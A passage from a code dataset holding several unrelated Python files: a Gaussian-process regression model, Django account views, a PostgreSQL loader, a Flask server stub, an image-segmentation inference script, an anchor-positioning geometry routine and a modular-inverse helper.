isinstance(length_scale_bounds,tuple):\n constraint = gpytorch.constraints.Interval(length_scale_bounds[0],length_scale_bounds[1])\n else:\n raise ValueError('Invalid argument for length_scale_bounds.')\n prior = gpytorch.priors.NormalPrior(length_scale,1)\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.MaternKernel(nu=nu,lengthscale_prior=prior),lengthscale_contraint = constraint)\n\n def forward(self, x):\n \"\"\" Calculate forward pass of GPModel.\n\n Parameters\n ----------\n x: Tensor\n Data tensor.\n \n Returns\n -------\n MultivariateNormal object\n \"\"\"\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n\n\nclass SVGP:\n \"\"\" Class for SVGP model.\n\n Attributes\n ----------\n train_loader: pytorch DataLoader\n DataLoader for training data.\n test_loader: pytorch DataLoader\n DataLoader for test data.\n inducing_points: array\n Subset of training data to use as inducing points.\n n_train: int\n Number of training points.\n n_test: int\n Number of test points.\n model: GPModel\n Instance of GPModel class.\n likelihood: gpytorch Likelihood\n Gaussian likelihood function.\n loss: list\n Loss for each epoch of training.\n \"\"\"\n def __init__(self,X_train,X_test,y_train,y_test,n_inducing=500,batch_size=256,nu=2.5,length_scale=1,length_scale_bounds=(1e-5,1e5)):\n \"\"\" Create a SVGP object.\n\n Parameters\n ----------\n X_train: array\n Training confounds with categorical values dummy encoded.\n X_test: array\n Test confounds with categorical values dummy encoded.\n y_train: array\n Training score/response variable.\n y_test: array\n Test score/response variable.\n length_scale: float, default=1\n Length scale parameter of Matern kernel.\n length_scale_bounds: pair of floats >= 0 or 'fixed', default=(1e-5, 1e5)\n The lower and upper bound on length_scale. If set to 'fixed', ‘length_scale’ cannot be changed during hyperparameter tuning.\n nu: float, default=2.5\n Nu parameter of Matern kernel.\n batch_size: int, default=256\n Batch size for SVGP model training and prediction.\n n_inducing: int, default=500\n Number of inducing points for SVGP model.\n \"\"\"\n # Get data in torch format\n train_x = torch.from_numpy(X_train).contiguous()\n test_x = torch.from_numpy(X_test).double().contiguous()\n train_y = torch.from_numpy(y_train).contiguous()\n test_y = torch.from_numpy(y_test).double().contiguous()\n\n # Create datasets\n train_dataset = TensorDataset(train_x, train_y)\n test_dataset = TensorDataset(test_x, test_y)\n\n # Create dataloaders\n self.train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n self.test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n inducing_idx = np.random.choice(np.array(range(train_x.shape[0])),size=n_inducing)\n self.inducing_points = train_x[inducing_idx, :]\n self.n_train = train_y.size(0)\n self.n_test = test_y.size(0)\n\n self.model = GPModel(inducing_points=self.inducing_points,nu=nu,length_scale=length_scale,length_scale_bounds=length_scale_bounds).double()\n self.likelihood = gpytorch.likelihoods.GaussianLikelihood()\n self.likelihood.initialize(noise=torch.std(train_x))\n\n if torch.cuda.is_available():\n self.model = self.model.cuda()\n self.likelihood = self.likelihood.cuda()\n \n self.loss = []\n \n def train(self,num_epochs=20):\n \"\"\" Trains the SVGP model.\n\n Parameters\n ----------\n num_epochs: int\n Number of epochs (full passes through dataset) to train for.\n \"\"\"\n self.model.train()\n self.likelihood.train()\n\n optimizer = torch.optim.Adam([{'params': self.model.parameters()},{'params': self.likelihood.parameters()}], lr=0.01)\n\n # Loss object. We're using the VariationalELBO\n mll = gpytorch.mlls.VariationalELBO(self.likelihood, self.model, num_data=self.n_train)\n\n epochs_iter = tqdm(range(num_epochs), desc=\"Epoch\")\n for i in epochs_iter:\n # Within each iteration, we will go over each minibatch of data\n minibatch_iter = tqdm(self.train_loader, desc=\"Minibatch\", leave=False)\n for x_batch, y_batch in minibatch_iter:\n optimizer.zero_grad()\n output = self.model(x_batch)\n loss = -mll(output, y_batch)\n minibatch_iter.set_postfix(loss=loss.item())\n loss.backward()\n optimizer.step()\n self.loss.append(loss.item())\n \n def predict(self):\n \"\"\" Predict from SVGP model.\n\n Returns\n ----------\n array\n Model predictions (mean of predictive distribution).\n array\n Model uncertainty (standard deviation of predictive distribution).\n \"\"\"\n self.model.eval()\n self.likelihood.eval()\n\n mean = torch.tensor([0.])\n sigma = torch.tensor([0.])\n with torch.no_grad():\n for x_batch, y_batch in self.test_loader:\n preds = self.likelihood(self.model(x_batch)) # get likelihood variance + posterior GP variance\n mean = torch.cat([mean, preds.mean.cpu()])\n sigma = torch.cat([sigma, torch.sqrt(preds.variance.cpu())])\n mean = mean[1:]\n sigma = sigma[1:]\n return mean, sigma","sub_path":"pynm/models/approx.py","file_name":"approx.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292255901","text":"from valuate import *\n\n\n# 返回结构格式\nresult_map = pd.DataFrame(columns=['intent', 'intent_source', 'predict_price'])\nresult_map['intent'] = pd.Series(gl.INTENT_TYPE)\nresult_map['intent_source'] = pd.Series(gl.INTENT_TYPE_CAN)\n\ncondition_evaluate_map = pd.read_csv(path + 'predict/condition_evaluate.csv')\n\n\n","sub_path":"valuate/predict/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281788506","text":"from django.conf import settings\nfrom django.shortcuts import redirect, render, resolve_url, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\n# from django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom django.views.generic import CreateView\nfrom django.contrib.auth import login as auth_login\nfrom .forms import SignupForm, EditForm\nfrom play.models import Game\n\n# def signup(request):\n# if request.method == 'POST':\n# form = UserCreationForm(request.POST)\n# if form.is_valid():\n# user = form.save()\n# auth_login(request, user)\n# next_url = request.GET.get('next') or 'profile'\n# return redirect(next_url)\n# else:\n# form = UserCreationForm()\n# return render(request, 'accounts/signup.html', {\n# 'form' : form,\n# })\nclass SignupView(CreateView):\n model = get_user_model()\n form_class = SignupForm\n template_name = 'accounts/signup.html'\n def get_success_url(self):\n next_url = self.request.GET.get('next') or 'profile'\n return resolve_url(next_url)\n def form_valid(self, SignupForm):\n user = SignupForm.save()\n auth_login(self.request, user)\n return redirect(self.get_success_url())\nsignup = SignupView.as_view()\n\n@login_required\ndef profile(request):\n return render(request, 'accounts/profile.html')\n\n@login_required\ndef profile_edit(request):\n current_user = request.user\n user = get_object_or_404(get_user_model(), username=current_user)\n if request.method == 'POST':\n form = EditForm(\n request.POST,\n instance=user,\n )\n if form.is_valid():\n user = form.save()\n auth_login(request, user)\n next_url = request.GET.get('next') or 'profile'\n return redirect(next_url)\n else:\n form = EditForm(\n initial={\n 'nickname': current_user.nickname\n },\n #수정시 placeholder가 아니라 initial를 설정하면 되는 것임!\n )\n return render(request, 'accounts/profile_edit.html', {\n 'form': form,\n })\n\n@login_required()\ndef mygame(request):\n request.session['user_id'] = request.user.id\n games_passive = Game.objects.filter(defender=request.user.id)\n games_active = Game.objects.filter(attacker=request.user.id)\n context = {\n 'games_p':games_passive,\n 'games_a':games_active\n }\n return render(request, 'accounts/mygame.html', context)","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433984975","text":"import psycopg2\n\nfrom loader import SqlBaseLoader\nfrom core_sql import Sql\n\nclass PostgresSql(Sql):\n @classmethod\n def table_exists(cls, table_name):\n schema, table = cls.parse_table_name(table_name)\n return \"\"\"\n SELECT EXISTS (\n SELECT 1\n FROM information_schema.tables\n WHERE table_schema = '{schema}'\n AND table_name = '{table_name}'\n );\"\"\".format(schema=schema, table_name=table)\n\n @classmethod\n def parse_table_name(cls, table_name):\n splits = [word for word in table_name.split('.') if word]\n if len(splits) == 1:\n schema, table = 'public', splits[0]\n elif len(splits) == 2:\n schema, table = splits\n else:\n raise ValueError('Table name should be in the format or .')\n return schema, table\n\n @classmethod\n def escape_table_name(cls, table_name):\n schema, table = cls.parse_table_name(table_name)\n return '\"{schema}\".\"{table_name}\"'.format(\n schema=schema,\n table_name=table\n )\n\n @classmethod\n def create_table(cls, table_name, columns):\n schema, table = cls.parse_table_name(table_name)\n create_query = super(PostgresSql, cls).create_table(table_name, columns)\n if schema != 'public':\n return \"\"\"\n CREATE SCHEMA IF NOT EXISTS \"{schema}\";\n {create_query};\n \"\"\".format(schema=schema, create_query=create_query)\n else:\n return create_query\n\n\nclass PostgresLoader(SqlBaseLoader):\n def __init__(self, connection):\n super().__init__(connection=connection)\n\n def connect(self, connection):\n return psycopg2.connect(connection)\n\n @property\n def sql(self):\n return PostgresSql\n","sub_path":"mETL/transforms/load-csv/postgres_loader.py","file_name":"postgres_loader.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63263951","text":"# Flask\nfrom flask import Flask\n# Sqlite\nfrom sqlalchemy import create_engine\n# Views\nfrom views import app_views\n# Utiles\nfrom dotenv import load_dotenv \nfrom os import getenv\n\nload_dotenv(verbose=True)\ndb_connect = create_engine('sqlite:///mock_data_db/mock_data.db')\n#Instace Class\napp = Flask(__name__)\napp.register_blueprint(app_views)\n\n\nif __name__ == '__main__':\n host = '0.0.0.0'\n port = '5000'\n if getenv('API_HOTS'):\n host = getenv('API_HOTS')\n if getenv('API_POTR'):\n port = getenv('API_PORT')\n\n print(getenv('API_POTR'))\n\n app.run(host=host, port=port, threaded=True)\n","sub_path":"api/v1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386316028","text":"import argparse\r\nimport numpy as np\r\nimport torch\r\n# torch.multiprocessing.set_start_method(\"spawn\", force=True)\r\nfrom torch.utils import data\r\nfrom networks.CE2P import Res_Deeplab\r\nfrom dataset.datasets import InferDataSet\r\nimport os\r\nimport torchvision.transforms as transforms\r\nfrom copy import deepcopy\r\nfrom utils.transforms import transform_parsing\r\nfrom utils.utils import get_lip_palette\r\nfrom PIL import Image\r\nfrom time import time\r\n# from tqdm import tqdm\r\n\r\nDATA_DIRECTORY = '/ssd1/liuting14/Dataset/LIP/'\r\nDATA_LIST_PATH = './dataset/list/lip/valList.txt'\r\n# IGNORE_LABEL = 255\r\nNUM_CLASSES = 20\r\nSNAPSHOT_DIR = './snapshots/'\r\nINPUT_SIZE = (473,473)\r\nPALETTE = get_lip_palette() \r\n\r\ndef get_arguments():\r\n \"\"\"Parse all the arguments provided from the CLI.\r\n \r\n Returns:\r\n A list of parsed arguments.\r\n \"\"\"\r\n parser = argparse.ArgumentParser(description=\"CE2P Network\")\r\n parser.add_argument(\"--save-dir\", type=str,\r\n help=\"Path for saving inference results.\")\r\n parser.add_argument(\"--data-dir\", type=str,\r\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\r\n parser.add_argument('--image-ext', type=str, default='jpg',\r\n help='image file name extension (default: jpg)')\r\n parser.add_argument(\"--list-path\", type=str,\r\n help=\"Path to a txt file containing image names for inference.\")\r\n parser.add_argument(\"--batch-size\", type=int, default=1,\r\n help=\"Number of images sent to the network in one step.\")\r\n parser.add_argument(\"--num_workers\", type=int, default=0,\r\n help=\"Number of cpu workers for dataloader.\")\r\n # parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\r\n # help=\"The index of the label to ignore during the training.\")\r\n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\r\n help=\"Number of classes to predict (including background).\")\r\n parser.add_argument(\"--restore-from\", type=str,\r\n help=\"Where restore model parameters from.\")\r\n parser.add_argument(\"--gpu\", type=str, default='0',\r\n help=\"choose gpu device.\")\r\n parser.add_argument(\"--input-size\", type=str, default=INPUT_SIZE,\r\n help=\"Comma-separated string with height and width of images.\")\r\n parser.add_argument(\"--mirror\", action=\"store_true\", help=\"combined with mirro results\")\r\n\r\n return parser.parse_args()\r\n\r\ndef transform_flip_pred(pred_flip):\r\n \"\"\"\" transform prediction from fliped images for combined with normal prediction\r\n\r\n Args:\r\n pred_flip: BxCxHxW\r\n \"\"\"\r\n pred_flip_copy = pred_flip.copy()\r\n right_idx = [15, 17, 19]\r\n left_idx = [14, 16, 18]\r\n for i in range(len(right_idx)):\r\n pred_flip[:,right_idx[i],:,:] = pred_flip_copy[:,left_idx[i],:,:]\r\n pred_flip[:,left_idx[i],:,:] = pred_flip_copy[:,right_idx[i],:,:]\r\n\r\n pred_flip = pred_flip[:,:,:,::-1].copy()\r\n return pred_flip\r\n\r\ndef infer(model, valloader, input_size, num_samples, gpus, save_dir, mirror=False):\r\n \"\"\"\r\n Args:\r\n mirror: combined with mirro results(only support single gpu)\r\n \"\"\"\r\n model.eval()\r\n\r\n interp = torch.nn.Upsample(size=(input_size[0], input_size[1]), mode='bilinear', align_corners=True)\r\n current_t = time()\r\n with torch.no_grad():\r\n for index, batch in enumerate(valloader):\r\n image, meta = batch\r\n num_images = image.size(0)\r\n if index % 10 == 0:\r\n print('%d processd in %.1fs' % (index * num_images, time()-current_t))\r\n current_t = time()\r\n\r\n # extract infomation for recovering predicition\r\n c = meta['center'].numpy()\r\n s = meta['scale'].numpy()\r\n h = meta['height'].numpy()\r\n w = meta['width'].numpy()\r\n n = meta['name']\r\n if mirror:\r\n image_flip = torch.from_numpy(image.numpy()[:,:,:,::-1].copy())\r\n image_all = torch.cat([image, image_flip])\r\n outputs = model(image_all.cuda())\r\n else:\r\n outputs = model(image.cuda())\r\n if gpus > 1:\r\n NotImplementedError(\"inference of muti-GPU has not implemented\") # TODO: muti-GPU\r\n # for output in outputs:\r\n # parsing = output[0][-1]\r\n # nums = len(parsing)\r\n # parsing = interp(parsing).data.cpu().numpy()\r\n # parsing = parsing.transpose(0, 2, 3, 1) # NCHW NHWC\r\n # parsing_preds[idx:idx + nums, :, :] = np.asarray(np.argmax(parsing, axis=3), dtype=np.uint8)\r\n else:\r\n parsing = outputs[0][-1]\r\n parsing = interp(parsing).data.cpu().numpy()\r\n if mirror:\r\n pred_ori, pred_flip = np.split(parsing, 2, axis=0)\r\n pred_flip = transform_flip_pred(pred_flip)\r\n parsing = np.mean([pred_ori, pred_flip], axis=0)\r\n parsing = parsing.transpose(0, 2, 3, 1) # NCHW->NHWC\r\n parsing_pred = np.asarray(np.argmax(parsing, axis=3), dtype=np.uint8)\r\n assert len(parsing_pred)==len(s)==len(c)==len(h)==len(w)==len(n)\r\n transform_and_save(parsing_pred, s, c, h, w, n, input_size, save_dir)\r\n\r\ndef transform_and_save(pred_batch, scales, centers, heights, widths, names, input_size, save_dir):\r\n for i in range(len(pred_batch)):\r\n pred_out = pred_batch[i]\r\n h, w, s, c = heights[i], widths[i], scales[i], centers[i]\r\n pred = transform_parsing(pred_out, c, s, w, h, input_size=input_size)\r\n output_im = Image.fromarray(pred)\r\n output_im.putpalette(PALETTE)\r\n output_im.save(os.path.join(save_dir, names[i]+'.png'))\r\n\r\n\r\ndef main():\r\n \"\"\"Create the model and start the evaluation process.\"\"\"\r\n args = get_arguments()\r\n # options\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=args.gpu\r\n gpus = [int(i) for i in args.gpu.split(',')]\r\n h, w = map(int, args.input_size.split(','))\r\n input_size = (h, w)\r\n # load data \r\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n transform = transforms.Compose([\r\n transforms.ToTensor(),\r\n normalize,\r\n ])\r\n\r\n lip_dataset = InferDataSet(args.data_dir, args.image_ext, crop_size=input_size, transform=transform)\r\n num_samples = len(lip_dataset)\r\n valloader = data.DataLoader(lip_dataset, batch_size=args.batch_size * len(gpus), \r\n num_workers=args.num_workers, shuffle=False, pin_memory=True)\r\n # load model\r\n model = Res_Deeplab(num_classes=args.num_classes)\r\n restore_from = args.restore_from\r\n state_dict = model.state_dict().copy()\r\n state_dict_old = torch.load(restore_from)\r\n\r\n for key, nkey in zip(state_dict_old.keys(), state_dict.keys()):\r\n if key != nkey:\r\n # remove the 'module.' in the 'key'\r\n state_dict[key[7:]] = deepcopy(state_dict_old[key])\r\n else:\r\n state_dict[key] = deepcopy(state_dict_old[key])\r\n\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n model.cuda()\r\n # infer and save result\r\n os.makedirs(args.save_dir, exist_ok=True)\r\n infer(model, valloader, input_size, num_samples, len(gpus), args.save_dir, args.mirror)\r\n print(\"Done.\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"infer_mirror.py","file_name":"infer_mirror.py","file_ext":"py","file_size_in_byte":7606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603442427","text":"# anchorFunc\n\"\"\"This function determines the tag position matrix\"\"\"\n\nimport numpy as np\nimport sys\nimport itertools as itt\nimport math\nimport copy\nimport matplotlib.pyplot as plt\n\ndef coordinateFunc(ancMat, anc2DPos, tagMat, tagPos, actualPositions):\n\n\n # Determine number of anchors\n ancNum, _ = ancMat.shape\n \n # Define temporary tag position matrix\n tempTagPos = np.array([[0.00, 0.00],[0.00, 0.00],[0.00, 0.00]])\n\n # Create all 3 anchor combinations\n ancList = list(range(0,ancNum))\n ancIts = [x for x in itt.combinations(ancList, 3) ]\n lenIts = len(ancIts)\n\n\n # Initialize arVec which contains aspect ratios (figures of merit) for equilaterial triangles\n arVec = np.zeros((lenIts, 1))\n\n\n # Loop over the ancIts list and find the most equilateral triangle\n for j in range(0,lenIts):\n triIts = [x for x in itt.combinations(ancIts[j], 2) ]\n\n d1 = ancMat[triIts[0][0], triIts[0][1]]\n d2 = ancMat[triIts[1][0], triIts[1][1]]\n d3 = ancMat[triIts[2][0], triIts[2][1]]\n\n s = 0.5*(d1 + d2 + d3)\n arVec[j,0] = (d1*d2*d3)/(4*(s-d1)*(s-d2)*(s-d3))\n \n\n # Now we choose the most equilateral triangle\n sortArgs = np.argsort(np.absolute(arVec),0)\n \n # And we also create vectors of its cyclic permutations\n refTri1 = list(ancIts[sortArgs[0][0]])\n refTri2 = [refTri1[1],refTri1[2],refTri1[0]]\n refTri3 = [refTri1[2],refTri1[0],refTri1[1]]\n\n\n # Now we will declare that the first point in refTri1 is the origin\n # We will then declare that the second point lies on the x-axis\n anc2DPos[refTri1[1],:] = np.array([ancMat[refTri1[0]][refTri1[1]],0])\n \n\n\n # Now we determine the third point relative to the other \n d1 = ancMat[refTri1[0]][refTri1[1]]\n d2 = ancMat[refTri1[1]][refTri1[2]]\n d3 = ancMat[refTri1[2]][refTri1[0]]\n\n\n # Now calculate the angles in the triangle\n cosTheta1 = (d1**2 + d3**2 - d2**2 )/(2*d1*d3)\n theta1 = math.acos(cosTheta1)\n \n\n # Using trig we find the third anchor\n anc2DPos[refTri1[2],:] = np.array([d3*cosTheta1,d3*np.sin(theta1)])\n \n\n # We have now found 3 anchors\n ancsFound = 3\n ancsFoundList = list(refTri1)\n \n \n # Using these cyclic permutations we can define a coordinate transformation matrix\n x2 = anc2DPos[refTri2[1], :] - anc2DPos[refTri2[0], :]\n x2 = x2/np.linalg.norm(x2)\n y2 = np.array([-x2[1],x2[0]])\n\n R2 = np.zeros((2,2))\n R2[:,0] = x2\n R2[:,1] = y2\n \n\n # And we define one more coordinate transformation\n x3 = anc2DPos[refTri3[1], :] - anc2DPos[refTri3[0], :]\n x3 = x3/np.linalg.norm(x3)\n y3 = np.array([-x3[1],x3[0]])\n\n R3 = np.zeros((2,2))\n R3[:,0] = x3\n R3[:,1] = y3\n #R3 = np.transpose(R3)\n\n\n # We still have to find these anchors\n pointsToFind = [x for x in ancList if x not in refTri1]\n\n\n # Now we loop over the remaining points\n # Remember d1 = distance from anchor[0] to anchor[1]\n for j in pointsToFind:\n\n # Calculate the coordinates using all three orientations \n # or \"view points\". We do this because if a point is colinear with the x-axis\n # then the triangle is degenerate and we \n d01 = ancMat[refTri1[0]][refTri1[1]]\n d0p = ancMat[refTri1[0]][j]\n d1p = ancMat[refTri1[1]][j]\n res1 = anc2DPos[refTri1[2],:]\n xp1 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm1 = np.array([np.sqrt(d0p**2 - xp1**2),-np.sqrt(d0p**2 - xp1**2)])\n\n d01 = ancMat[refTri2[0]][refTri2[1]]\n d0p = ancMat[refTri2[0]][j]\n d1p = ancMat[refTri2[1]][j]\n res2 = anc2DPos[refTri2[2],:]\n xp2 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm2 = np.array([np.sqrt(d0p**2 - xp2**2),-np.sqrt(d0p**2 - xp2**2)])\n\n d01 = ancMat[refTri3[0]][refTri3[1]]\n d0p = ancMat[refTri3[0]][j]\n d1p = ancMat[refTri3[1]][j]\n res3 = anc2DPos[refTri3[2],:]\n xp3 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm3 = np.array([np.sqrt(d0p**2 - xp3**2),-np.sqrt(d0p**2 - xp3**2)])\n\n \n \n # Transform the other values back into the original frame\n # We must transport the [xp2,ypm2] and [xp3,ypm3] points to the new origin\n xy1 = np.array(([xp1,xp1],[ypm1[0],ypm1[1]]))\n xy2 = np.dot(R2,np.array(([xp2,xp2],[ypm2[0],ypm2[1]]))) + np.array(([anc2DPos[refTri2[0]][0],anc2DPos[refTri2[0]][0]],[anc2DPos[refTri2[0]][1],anc2DPos[refTri2[0]][1]]))\n xy3 = np.dot(R3,np.array(([xp3,xp3],[ypm3[0],ypm3[1]]))) + np.array(([anc2DPos[refTri3[0]][0],anc2DPos[refTri3[0]][0]],[anc2DPos[refTri3[0]][1],anc2DPos[refTri3[0]][1]])) \n\n\n \n # Now we must use the reflection resolver to make sure we have the correct solution\n distTol = 1\n \n # Check using LCS 1\n trueDist = ancMat[refTri1[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 1])\n if trueDist - dist1 < distTol:\n soln1 = xy1[:, 0] \n elif trueDist - dist2 < distTol:\n soln1 = xy1[:, 1] \n else:\n soln1 = np.nan\n\n # Check using LCS 2\n trueDist = ancMat[refTri2[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 1])\n if trueDist - dist1 < distTol:\n soln2 = xy2[:, 0] \n elif trueDist - dist2 < distTol:\n soln2 = xy2[:, 1] \n else:\n soln2 = np.nan \n\n \n # Check using LCS 3\n trueDist = ancMat[refTri3[2]][j]\n dist1 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 1])\n if trueDist - dist1 < distTol:\n soln3 = xy3[:, 0] \n elif trueDist - dist2 < distTol:\n soln3 = xy3[:, 1] \n else:\n soln3 = np.nan \n \n ###########################################################\n # BIG ASSUMPTION HERE: NEED TO ADD ROBUSTNESS\n ###########################################################\n # For now let's enter soln 1 into the anc2DPos matrix\n anc2DPos[j, :] = soln3\n\n ###############################################################\n # NOW LOCATE THE TAGS ON THE FIELD\n ###############################################################\n\n # Now we locate the tags and use their positions to fix the coordinate SystemError\n \n for j in range(0,3):\n\n # Calculate the coordinates using all three orientations \n # or \"view points\". We do this because if a point is colinear with the x-axis\n # then the triangle is degenerate and we \n d01 = ancMat[refTri1[0]][refTri1[1]]\n d0p = tagMat[j][refTri1[0]]\n d1p = tagMat[j][refTri1[1]] \n xp1 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm1 = np.array([np.sqrt(d0p**2 - xp1**2),-np.sqrt(d0p**2 - xp1**2)])\n\n d01 = ancMat[refTri2[0]][refTri2[1]]\n d0p = tagMat[j][refTri2[0]]\n d1p = tagMat[j][refTri2[1]] \n xp2 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm2 = np.array([np.sqrt(d0p**2 - xp2**2),-np.sqrt(d0p**2 - xp2**2)]) \n\n d01 = ancMat[refTri3[0]][refTri3[1]]\n d0p = tagMat[j][refTri3[0]]\n d1p = tagMat[j][refTri3[1]] \n xp3 = ((d01**2 +d0p**2 - d1p**2)/(2*d01))\n ypm3 = np.array([np.sqrt(d0p**2 - xp3**2),-np.sqrt(d0p**2 - xp3**2)])\n \n # Transform the other values back into the original frame\n # We must transport the [xp2,ypm2] and [xp3,ypm3] points to the new origin\n xy1 = np.array(([xp1,xp1],[ypm1[0],ypm1[1]]))\n xy2 = np.dot(R2,np.array(([xp2,xp2],[ypm2[0],ypm2[1]]))) + np.array(([anc2DPos[refTri2[0]][0],anc2DPos[refTri2[0]][0]],[anc2DPos[refTri2[0]][1],anc2DPos[refTri2[0]][1]]))\n xy3 = np.dot(R3,np.array(([xp3,xp3],[ypm3[0],ypm3[1]]))) + np.array(([anc2DPos[refTri3[0]][0],anc2DPos[refTri3[0]][0]],[anc2DPos[refTri3[0]][1],anc2DPos[refTri3[0]][1]])) \n \n # Now we must use the reflection resolver to make sure we have the correct solution\n distTol = 1\n \n # Check using LCS 1\n trueDist = tagMat[j][refTri1[2]] \n dist1 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 1])\n if trueDist - dist1 < distTol:\n soln1 = xy1[:, 0] \n elif trueDist - dist2 < distTol:\n soln1 = xy1[:, 1] \n else:\n soln1 = np.nan\n\n # Check using LCS 2 \n trueDist = tagMat[j][refTri2[2]]\n dist1 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 1])\n if trueDist - dist1 < distTol:\n soln2 = xy2[:, 0] \n elif trueDist - dist2 < distTol:\n soln2 = xy2[:, 1] \n else:\n soln2 = np.nan \n\n \n # Check using LCS 3 \n trueDist = tagMat[j][refTri3[2]]\n dist1 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 1])\n if trueDist - dist1 < distTol:\n soln3 = xy3[:, 0] \n elif trueDist - dist2 < distTol:\n soln3 = xy3[:, 1] \n else:\n soln3 = np.nan \n \n ###########################################################\n # BIG ASSUMPTION HERE: NEED TO ADD ROBUSTNESS\n ###########################################################\n # For now let's enter soln 1 into the tempTagPos matrix\n tempTagPos[j, :] = soln1\n\n\n\n plt.subplot(1, 2, 1)\n plt.scatter(actualPositions[:, 0], actualPositions[:, 1], color='red')\n plt.scatter(tagPos[0, 0], tagPos[0, 1], color='black', marker = 'o')\n plt.scatter(tagPos[1, 0], tagPos[1, 1], color='black', marker = 'x')\n plt.scatter(tagPos[2, 0], tagPos[2, 1], color='black', marker = '1')\n plt.title('Actual Position')\n plt.axis('equal')\n plt.grid()\n\n plt.subplot(1, 2, 2)\n plt.scatter(anc2DPos[:, 0], anc2DPos[:, 1], color='blue')\n plt.scatter(tempTagPos[0, 0], tempTagPos[0, 1], color='black', marker = 'o')\n plt.scatter(tempTagPos[1, 0], tempTagPos[1, 1], color='black', marker = 'x')\n plt.scatter(tempTagPos[2, 0], tempTagPos[2, 1], color='black', marker = '1')\n plt.title('Calculated Position')\n plt.axis('equal')\n plt.grid()\n\n plt.show()\n sys.exit()\n\n\n\n # Now reorient the coordinate system to reflect the tag positions\n translateVec = copy.deepcopy(tempTagPos[0, :])\n \n # Translate\n for j in range(0,ancNum):\n anc2DPos[j, :] = anc2DPos[j, :] - translateVec\n for j in range(0,3): \n tempTagPos[j, :] = tempTagPos[j, :] - translateVec\n \n\n\n # Rotate\n theta = np.arctan2(tempTagPos[1,1],tempTagPos[1,0])\n rotateMat = np.transpose(np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]]))\n\n anc2DPos = np.transpose(np.dot(rotateMat, np.transpose(anc2DPos)))\n tempTagPos = np.transpose(np.dot(rotateMat, np.transpose(tempTagPos)))\n \n # Flip the coordinate system\n # The tags were ordered around the field in a right-hand configuration\n # So the z component of the cross product is positive\n # Now we check if this is the case and flip if appropriate\n V1 = np.append(tempTagPos[1, :] - tempTagPos[0, :], [0.00])\n V2 = np.append(tempTagPos[2, :] - tempTagPos[1, :], [0.00])\n V3 = np.cross(V1,V2)\n\n # if V3[2] is negative then we must flip across the x-axis\n if V3[2]<0.00:\n anc2DPos[:,1] = -anc2DPos[:,1]\n tempTagPos[:,1] = -tempTagPos[:,1]\n\n return anc2DPos\n","sub_path":"Projects/autoSetup/coordinateFunc/coordinateFunc.py","file_name":"coordinateFunc.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549992032","text":"import numpy as np\n\n# key should be a numpy array\ndef mod_inv(key):\n '''\n Modular inverse. Only for mod 31.\n\n Arguments:\n key: a 2-D numpy array\n\n Return:\n modinv: modular inverse of key\n '''\n det = int(round(np.linalg.det(key))) # determinant of key\n adj = np.linalg.inv(key) * det # adjugate matrix of key\n assert det % 31 != 0\n moddet = np.mod(det ** 29, 31) # Fermat's Little Theorem\n modinv = np.around(np.mod(adj * moddet, 31)).astype(int)\n return modinv\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195180833","text":"import os\n\nimport StringIO\nimport numpy as np\nimport pandas as pd\nimport requests\nimport urllib3\nimport zipfile\nfrom pandas import DataFrame as 